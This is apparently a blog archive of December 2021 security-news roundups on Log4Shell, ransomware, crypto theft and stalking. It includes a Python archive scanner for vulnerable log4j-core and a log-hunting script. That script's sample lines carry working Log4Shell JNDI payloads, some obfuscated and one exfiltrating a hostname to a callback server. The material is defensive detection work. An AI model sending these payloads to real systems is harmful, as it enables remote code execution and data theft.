Tag Archives: Log4j

Security News for the Week Ending December 31, 2021

W. Va. Hospital Breach Timeline – Way Too Long

The Monongalia Health System was attacked recently: hackers had access to several email accounts, apparently belonging to contractors, from May 10 to August 15, or about three months. It then took another 60 days to investigate, and they are only now telling us about the breach, more than seven months after it started. They only figured out that they were hacked because a vendor said it had not been paid (a standard business email compromise attack). They will, no doubt, get whacked by the feds, but this is a lesson to everyone that your vendors are your risk too. Credit: ZDNet

Java Code Repo Riddled with Hidden Log4j Bugs

Remember that you should assume that any code you download from the net is full of bugs and security holes. If you assume that and you are lucky, good; if you assume the reverse and you are not lucky, not so good. Threatpost is reporting that there are 17,000 unpatched Log4j packages in the Maven Central ecosystem. Many of those will never be patched, which means a dependency pulled in transitively by something you build against can stay vulnerable long after you have updated log4j-core itself. CAVEAT EMPTOR

Fallout from Kronos Ransomware Attack – Some Employees Not Receiving Full Pay

Kronos, the international HR firm, suffered a ransomware attack several weeks ago. Some employees at appliance maker Electrolux say that they are still not receiving their full wages or, in some cases, not getting paid at all. In most states the law is quite specific about paying employees on time, so if you don't want to be on the wrong end of an investigation, have a disaster recovery plan for payroll that does not depend on a single vendor being up. Credit: Cyber News

North Korean Hackers Stole $1.7 Billion as an Investment

North Korea considers cryptocurrency a long-term investment. As a result, when they steal billions in crypto, instead of selling it, they hold it. Maybe that is not a bad strategy. Bitcoin, for example, was worth $313 in 2015, $997 in 2017, $3,869 in 2019 and $46,847 right now. So if you stole one coin in 2015, your "investment" has returned roughly 150x; that is, your $313 crime is worth $46,847. Maybe the North Koreans are onto something. Credit: Dailycoin

Oops, The Dog Ate 77 TB of Our Backups

Well, not exactly, but something ate the backups. Kyoto University in Japan lost 77 terabytes of data when a backup process on its Hewlett Packard Enterprise (HPE) supercomputer went wrong. In mid-December, 34 million files were wiped from the system and from the backups. The university has determined that some of the data cannot be restored, and has not said how this happened or what the impact is. The lesson is an old one: a backup job that has write access to the copies it is supposed to protect is not a backup strategy; keep at least one copy that the production tooling cannot delete. Credit: Bleeping Computer

Security News for the Week Ending December 17, 2021

The Gift That Keeps on Giving – Log4j – List of Affected Vendors

First, get used to hearing about this. It will be haunting us for months, at least. Jen Easterly, current head of DHS's CISA, formerly at NSA and a professor at the US Military Academy at West Point, says this may be THE WORST vulnerability she has seen in her career. As of Monday, here is a list of affected vendors. If you use any of these vendors, and it looks like a who's who of computer software, watch for patches. Second, it looks like the first patch for Log4j, 2.15.0, did not fully close the hole, and there is now a new release, 2.16.0. This will keep evolving, so if you are a company that uses software, this applies to you.

From Friday through Tuesday researchers tracked more than 840,000 attempted attacks probing for the Log4j vulnerability. They are only getting started. Credit: Ars Technica

Hackers Hit Third Cryptocurrency Company This Month: Total Haul Is Over $400 Million

Vulcan Forged is the next cryptocurrency company to get hit by hackers, who stole about $135 million from it. If you get the sense that cryptocurrency software is buggy and processes are weak, you have it about right. In Vulcan Forged's case, since the platform is decentralized, there is no central authority to block the movement of stolen currency. This is not going to end anytime soon. Credit: Vice

Apple AirTags Make a Wonderful Stalking Tool

Stalkers are using Apple AirTags to stalk people. A woman in Arkansas, for example, got into her car and her iPhone told her that an AirTag was following her. She found the tag on her trunk. If a stalker had tried to hide it, say somewhere under her car, it would have been much harder to find. Apple says that Android users can detect a rogue AirTag because it will beep if it is separated from its owner for more than three days (assuming that is actually the case). Credit: Apple Insider and Daily Kos

Apple has since released an Android app, Tracker Detect, to find rogue AirTags, but how many Android users are going to think of downloading an Apple app? Credit: PC Mag

Feds Don’t Quite Handle Incident Response

A backdoor in the network of the United States Commission on International Religious Freedom allowed attackers to intercept, and likely exfiltrate, all local network traffic on the agency's systems. Security firm Avast discovered the intrusion in May, spoke to the agency's executive director and even talked to CISA. After getting no follow-up for months, Avast published its findings. Avast says that due to the lack of communication from the agency, it does not know whether the problem was ever fixed. It has since reached out to other agencies and NGOs focused on international rights to warn them. Maybe the agency fixed the problem right away? Who knows? Credit: Data Breach Today

Log4j Vulnerability Impact Grows

Log4j is a very popular Java logging library, so it runs anywhere Java does: Linux and Windows servers, cloud services, IoT devices and other appliances. It is used not only in corporate software development environments but also by very well known companies like Apple. The vulnerability (CVE-2021-44228, widely called Log4Shell) is triggered simply by getting a crafted string such as a JNDI lookup into anything the application logs, which is why it reaches so far.

DHS’s CISA has created a web page with guidance, here and has also put out an alert, here.

Unfortunately, given the current state of the software industry, users will have difficulty knowing whether any software they run locally, or any cloud service they use, is affected.

If vendors were required to provide a software "bill of materials" (SBOM), something that is being mandated for software sold to the federal government as a result of the President's Cybersecurity Executive Order, then consumers like you and me would have a chance of knowing which software is affected.

For those with a strong IT department, some vendors have released detection tools to figure out whether you are running vulnerable software (for example, here is Datto's announcement, but you have to be running their management software). The tools generally do the same thing: walk the filesystem for Java archives, look inside them for log4j-core and its JndiLookup class, and compare the version against the fixed release.
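What such a scanner does, as an added example written for this page rather than Datto's or any vendor's tool: it walks a directory for jar, war, ear and zip files, descends into archives packed inside archives (the usual place a vulnerable log4j-core hides is WEB-INF/lib inside a war), reads the version from log4j-core's pom.properties, and checks whether JndiLookup.class is still present (deleting that class from the jar was the documented workaround where patching was not possible). The fixed-version threshold of 2.16.0 reflects the post's timeline and is an assumption to update against current advisories; the sample archives are constructed on the fly and contain no real bytecode.

```python
"""Inventory scan for Log4j 2 archives (added example, not any vendor's tool)."""
import io
import os
import re
import tempfile
import zipfile
from dataclasses import dataclass
from typing import Optional

ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
# State of play in the post: 2.15.0 was incomplete, 2.16.0 is the target.
# Assumption: raise this when the project publishes a later minimum.
FIXED_VERSION = (2, 16, 0)


@dataclass
class Finding:
    path: str                # "outer.war!WEB-INF/lib/inner.jar" for nested archives
    version: Optional[str]   # None when pom.properties is missing (shaded/renamed jar)
    has_jndi_lookup: bool
    vulnerable: bool


def parse_version(pom_properties: str):
    m = re.search(r"^version=(\d+)\.(\d+)\.(\d+)", pom_properties, re.M)
    return tuple(int(x) for x in m.groups()) if m else None


def scan_archive(path: str, data: Optional[bytes] = None):
    """Walk one archive (and any archives packed inside it) for log4j-core."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data) if data is not None else path)
    except zipfile.BadZipFile:
        return findings
    with zf:
        names = set(zf.namelist())
        if POM_PROPS in names or JNDI_CLASS in names:
            version = None
            if POM_PROPS in names:
                version = parse_version(zf.read(POM_PROPS).decode("utf-8", "replace"))
            has_jndi = JNDI_CLASS in names
            # Class present and version unknown or below the fix line: vulnerable.
            # Class removed (the "zip -d" workaround): JNDI lookup cannot run.
            vulnerable = has_jndi and (version is None or version < FIXED_VERSION)
            findings.append(Finding(path, ".".join(map(str, version)) if version else None,
                                    has_jndi, vulnerable))
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_EXT):
                findings.extend(scan_archive(f"{path}!{name}", zf.read(name)))
    return findings


def scan_tree(root: str):
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXT):
                findings.extend(scan_archive(os.path.join(dirpath, f)))
    return findings


# --- constructed sample data so the scanner runs offline -------------------
def build_log4j_jar(version: str, include_jndi: bool = True) -> bytes:
    """Stand-in for log4j-core: only the two entries the scanner keys on."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                               f"artifactId=log4j-core\nversion={version}\n")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()


def build_sample_tree(root: str):
    os.makedirs(os.path.join(root, "lib"), exist_ok=True)
    war = io.BytesIO()                       # unpatched 2.14.1 packed inside a WAR
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", build_log4j_jar("2.14.1"))
    with open(os.path.join(root, "app.war"), "wb") as fh:
        fh.write(war.getvalue())
    with open(os.path.join(root, "lib", "log4j-core-2.16.0.jar"), "wb") as fh:
        fh.write(build_log4j_jar("2.16.0"))  # patched
    with open(os.path.join(root, "lib", "log4j-core-2.14.1-stripped.jar"), "wb") as fh:
        fh.write(build_log4j_jar("2.14.1", include_jndi=False))  # class deleted


def demo():
    """Scan a constructed tree; returns {relative path: vulnerable} with '/' separators."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return {os.path.relpath(f.path, root).replace(os.sep, "/"): f.vulnerable
                for f in scan_tree(root)}


if __name__ == "__main__":
    for path, vulnerable in sorted(demo().items()):
        print("VULNERABLE" if vulnerable else "ok        ", path)
```

Point `scan_tree` at `/opt`, `/usr/share` or an application server's deployment directory to use it for real. Shaded or renamed jars carry no pom.properties, which is why the scanner still flags a jar that contains JndiLookup.class but no version: treat those as needing manual review rather than as clean.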

CISA created a "must patch" list for executive branch agencies, the Known Exploited Vulnerabilities catalog under Binding Operational Directive 22-01, a month or two ago. The list contains bugs that agencies must patch by a deadline, and this bug was added to it along with 12 others.

SC Magazine says that the cleanup from this will take months, at least. Some companies will not be responsible and will not spend the time to clean up their part of the mess (i.e., patch their vulnerable software). If they don't tell us that their software is vulnerable, and legally they are not required to, then we will continue to use it, not understanding that our systems and our data are at risk.

If this bug is exploited, and it can be exploited remotely without any authentication, the attacker gets code execution with whatever privileges the Java process has, so all data on the affected system is at risk! The trigger is nothing more than a string like ${jndi:ldap://attacker-host/x} landing in a logged field (a User-Agent header, a username, a search term), which causes Log4j to fetch and load code from the attacker's server.

It is also important to understand that hackers, who are ALREADY exploiting this bug, will add back doors to compromised systems, so that even after the bug is patched the hackers will remain inside many networks, lurking undetected. Patching closes the door; it does not evict whoever already walked through it.

There are many cases of hackers remaining inside corporate networks, undetected, for years.

Given that there are 3 billion or so devices running Java, some percentage of those need to log and this is the go-to package. Many of those devices will never be patched and will always be a hole into your network.

Among vendors that we think are affected are Amazon's AWS, Broadcom, Cisco, ConnectWise, Fortinet, HCL, IBM, N-able, Okta, VMware and likely hundreds of others. Not all products from these vendors are affected.

Businesses need to hold their vendors accountable. Unless you are a big company with clout you probably can’t force your vendors to be accountable, but if you don’t ask, you certainly won’t get information.

Also, all users need to stay current on all patches. Hopefully, most vendors will be responsible and release patches. This is one place where small companies get to benefit from large businesses' ability to beat up the same vendors that you use.

Users need to be vigilant. Vendors will probably be releasing patches over the next few months, and some will release alerts and workarounds rather than patches. This one will not be over soon.

If you are running any old, unsupported software, you are basically on your own. Not only will you not get any patches, you probably won’t even know that you are running affected software.

Also remember that if your vendor gets hacked as a result of this bug, you are both responsible and likely legally liable. Just saying.

If you have questions, please contact us.

Security News for the Week Ending December 10, 2021

New Log4j Java Library Zero-Day Is Being Exploited in the Wild

A proof of concept for a zero-day vulnerability in the very popular Apache Log4j Java library is being shared online. Log4j is used both in enterprises and in cloud services. Products from Apple, Amazon, Twitter and Steam, among others, may be vulnerable to remote code execution exploits. All versions from 2.0-beta9 through 2.14.1 are vulnerable. CISA and other government agencies have issued alerts. Many Managed Service Providers are finding themselves under attack. Find details at Bleeping Computer, US-CERT and Huntress Labs.
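Both this item and the 840,000 probes reported in the December 17 post raise the same practical question: how do you tell from your own web-server logs whether you were scanned, and from where? The script below is an added example written for this page, not code from any of the cited sources. It runs over constructed Apache/nginx combined-format log lines, URL-decodes them, unwinds the lookup obfuscation that real probes used (${lower:j}, ${upper:...}, and the ${key:-default} fallback, all of which Log4j 2 evaluates exactly this way) and reports the JNDI callback host for each hit. The IPs and timestamps in the sample are made up.

```python
"""Hunt for Log4Shell probes in web-server logs (added example, not from the post's sources)."""
import re
from urllib.parse import unquote

# Innermost ${...} that has no further lookup nested inside it.
INNER = re.compile(r"\$\{([^${}]*)\}")
# What matters once obfuscation is unwound: a JNDI lookup and its callback target.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/\s}]+)", re.I)


def _resolve(m):
    """Evaluate one innermost lookup the way Log4j 2 does, for the tricks seen in the wild."""
    expr = m.group(1)
    if ":-" in expr:                  # ${env:NOPE:-j} or ${::-j}: undefined key -> default
        return expr.split(":-", 1)[1]
    prefix, _, rest = expr.partition(":")
    if prefix.lower() == "lower":     # ${lower:J} -> j
        return rest.lower()
    if prefix.lower() == "upper":     # ${upper:l} -> L
        return rest.upper()
    return m.group(0)                 # jndi: and anything unknown stays as written


def normalize(text, max_rounds=20):
    """URL-decode (repeatedly, for double encoding), then unwind nested lookups until stable."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        unwound = INNER.sub(_resolve, text)
        if unwound == text:
            break
        text = unwound
    return text


def scan_lines(lines):
    """One record per line that carries a JNDI lookup, with the decoded callback target."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        m = JNDI.search(norm)
        if m:
            hits.append({"line": n, "src": line.split(" ", 1)[0],
                         "scheme": m.group(1).lower(), "callback": m.group(2),
                         "lookup": m.group(0)})
    return hits


# Constructed sample: four probe styles plus one benign line that also contains "${".
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:14:21:05 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.9:1389/a}"',
    '198.51.100.4 - - [10/Dec/2021:14:22:10 +0000] '
    '"GET /${${lower:j}ndi:${lower:l}dap://198.51.100.4/x} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [10/Dec/2021:14:23:44 +0000] "GET /%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D'
    '%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Aldap%3A%2F%2F192.0.2.10%2Fa%7D HTTP/1.1" 404 0 "-" '
    '"curl/7.79.1"',
    '203.0.113.9 - - [10/Dec/2021:14:24:30 +0000] "GET / HTTP/1.1" 200 2048 "-" '
    '"${jndi:ldap://203.0.113.9/${env:HOSTNAME}}"',
    '192.0.2.33 - - [10/Dec/2021:14:25:01 +0000] "GET /search?q=${price} HTTP/1.1" 200 900 "-" '
    '"Mozilla/5.0"',
]

if __name__ == "__main__":
    for h in scan_lines(SAMPLE_LOG):
        print(f"line {h['line']}: {h['src']} -> {h['scheme']}://{h['callback']}  {h['lookup']}")
```

The fourth sample line is the variant to worry about most: the inner ${env:HOSTNAME} is not a default-value lookup, so it stays unresolved, but the outer JNDI lookup is still caught and the callback host tells you who was trying to exfiltrate environment variables. Feed the same function your real access logs, then pivot on the callback hosts in your DNS and egress logs: an outbound LDAP or RMI connection to one of them from a Java process is the difference between "we were scanned" and "we were hit".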

Researcher Found Method to Brute Force Verizon PINs

A researcher discovered a bug that allowed him to brute-force any customer's Verizon account security PIN. After he reported it, Verizon told Vice that it had solved the problem by taking down the vulnerable web pages. Hopefully, when those pages return, the bug (and the missing rate limiting that made brute force possible) will actually be fixed. Credit: Vice

US Military Admits to Offensive Hacking

US Cyber Command, which shares its commander with the NSA, has confirmed that it has taken unspecified offensive actions to disrupt hackers' ability to hack. This comes from none other than General Paul Nakasone, head of both the NSA and Cyber Command. While they know that they can't shut hackers down, they also know that they can make hacking more costly. Nakasone said that a number of elements of the government (i.e., more than just the NSA) have taken actions and "we have imposed costs." Just speculating, but hackers are often not good programmers and are even worse at operational security, so it is not at all surprising that they can be hacked. Historically we haven't done that, but it looks like now we are. Credit: CNN

A Camera the Size of a Grain of Salt

It can take better full-color images than a camera 500,000 times its size, and it works in ordinary light. The surface is made from silicon nitride, meaning it can be made in microchip manufacturing plants. It could be used in medicine (in an endoscope, say), but think about the uses by spies. What an incredible spy cam: no one is going to notice a grain of salt. Credit: Vice

In the Face of a $150 BILLION Lawsuit, Facebook Bans Myanmar Military

Facebook announced this week that it will remove pages, groups and accounts representing military-controlled businesses in Myanmar. Many criticized it as a cynical ploy to deflect criticism coming from the $150 billion lawsuit. The US lawsuit alleges that Facebook's algorithms recommended extremist groups and violent content in exchange for more engagement. Credit: ZDNet